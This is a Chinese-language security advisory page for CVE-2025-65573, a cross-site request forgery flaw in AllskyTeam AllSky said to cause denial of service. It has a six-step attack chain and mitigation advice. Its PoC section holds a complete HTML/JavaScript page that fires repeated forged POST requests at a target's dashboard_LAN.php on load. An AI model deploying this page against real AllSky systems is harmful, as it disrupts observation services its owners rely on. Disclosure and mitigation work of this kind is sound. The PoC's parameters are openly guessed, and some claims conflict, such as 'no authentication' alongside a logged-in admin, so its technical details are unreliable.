IPBUF安全漏洞报告
English
CVE-2025-65573 CVSS 8.8 高危

CVE-2025-65573 | AllSky Team AllSky CSRF拒绝服务漏洞

披露日期: 2025-12-09
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-65573
漏洞类型
CSRF(跨站请求伪造)/ 拒绝服务
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
AllskyTeam AllSky

相关标签

CSRF跨站请求伪造拒绝服务AllSkyAllskyTeamCVE-2025-65573高危漏洞网络设备漏洞Web应用安全handle_interface_POST_and_status

漏洞概述

CVE-2025-65573是AllskyTeam AllSky软件中的一个跨站请求伪造(CSRF)漏洞,该漏洞存在于处理网络接口POST请求和状态信息的handle_interface_POST_and_status函数中。攻击者可以通过构造恶意的Web页面或链接,诱使已登录的管理员用户在不知情的情况下发起恶意请求,从而导致系统拒绝服务。该漏洞无需认证即可被利用,但需要用户交互,攻击者需要诱导管理员点击恶意链接或访问特制网页。由于AllSky通常部署在天文观测和气象监测场景中,攻击成功可能导致实时观测数据中断,影响科学研究和监测任务的连续性。漏洞评分8.8分,属于高危级别,CVSS向量显示攻击复杂度低,无需特殊权限,但可造成机密性、完整性和可用性的高度影响。

技术细节

该漏洞源于AllSky应用在处理网络接口配置请求时缺乏有效的CSRF令牌验证机制。具体来说,handle_interface_POST_and_status函数在处理来自LAN和WLAN仪表板的POST请求时,未能正确验证请求的来源和有效性。攻击者可以创建一个包含自动提交表单的HTML页面,当管理员访问该页面时,浏览器会自动向AllSky服务器发送恶意请求。由于浏览器会自动携带目标域的Cookie,服务器无法区分这是合法管理员的操作还是攻击者伪造的请求。攻击者可以发送大量特制的请求或构造导致系统异常处理的请求参数,触发拒绝服务条件。根据GitHub代码分析,漏洞涉及html/includes/dashboard_LAN.php、dashboard_WLAN.php和functions.php等文件,这些文件在处理网络接口配置时缺少CSRF保护机制。建议在所有状态修改操作中添加CSRF令牌验证,并在服务器端实现请求来源验证。

攻击链分析

STEP 1
步骤1
攻击者搭建恶意网站或发送包含恶意链接的钓鱼邮件,诱使AllSky管理员访问
STEP 2
步骤2
受害者浏览器加载攻击者控制的页面,页面中的JavaScript自动向AllSky服务器发送恶意POST请求
STEP 3
步骤3
由于浏览器自动携带目标域的Cookie,AllSky服务器无法区分合法请求和伪造请求
STEP 4
步骤4
恶意请求到达handle_interface_POST_and_status函数,触发异常处理逻辑
STEP 5
步骤5
特制的请求参数导致系统资源耗尽或进入错误状态,触发拒绝服务条件
STEP 6
步骤6
AllSky服务中断,天文观测数据采集停止,影响科学研究和监测任务

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CSRF PoC for CVE-2025-65573 --> <!-- Target: AllskyTeam AllSky handle_interface_POST_and_status function --> <!-- This PoC demonstrates CSRF attack leading to DoS --> <!DOCTYPE html> <html> <head> <title>AllSky CSRF PoC - CVE-2025-65573</title> </head> <body> <h1>AllSky CSRF DoS Attack PoC</h1> <p>If successful, this will cause denial of service on the target AllSky system.</p> <script> // Function to send malicious POST request function sendMaliciousRequest() { // Target AllSky LAN interface endpoint const targetUrl = 'http://TARGET_IP/html/includes/dashboard_LAN.php'; // Malicious payload that triggers DoS via handle_interface_POST_and_status const maliciousData = { // Malformed parameters to trigger error condition 'interface_status': 'invalid_status', 'handle_interface_POST_and_status': '1', // Add parameters that may cause resource exhaustion 'action': 'configure', 'lan_settings': JSON.stringify({ 'ip': '0.0.0.0', 'gateway': '0.0.0.0', 'dns': '0.0.0.0', 'subnet': '0.0.0.0' }) }; // Send POST request fetch(targetUrl, { method: 'POST', mode: 'no-cors', // Bypass CORS for CSRF headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: new URLSearchParams(maliciousData) }) .then(() => console.log('Request sent')) .catch(err => console.error('Error:', err)); } // Auto-execute on page load window.onload = function() { // Send multiple requests to increase DoS effect for(let i = 0; i < 10; i++) { setTimeout(sendMaliciousRequest, i * 100); } }; </script> <noscript> <p>JavaScript is required for this attack.</p> <form id="csrfForm" action="http://TARGET_IP/html/includes/dashboard_LAN.php" method="POST"> <input type="hidden" name="interface_status" value="invalid_status"> <input type="hidden" name="handle_interface_POST_and_status" value="1"> <input type="hidden" name="action" value="configure"> <button type="submit">Click to Attack</button> </form> <script>document.getElementById('csrfForm').submit();</script> </noscript> </body> </html>

影响范围

AllskyTeam AllSky v2024.12.06_06

防御指南

临时缓解措施
在等待官方修复期间,可采取以下临时缓解措施:1)临时禁用不必要的网络接口配置功能;2)使用Web应用防火墙(WAF)规则阻止可疑的跨域POST请求;3)限制管理界面的访问来源,仅允许内网IP访问;4)监控服务器日志,及时发现异常的POST请求模式;5)考虑使用浏览器安全插件防止CSRF攻击;6)定期检查GitHub官方仓库的安全更新。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表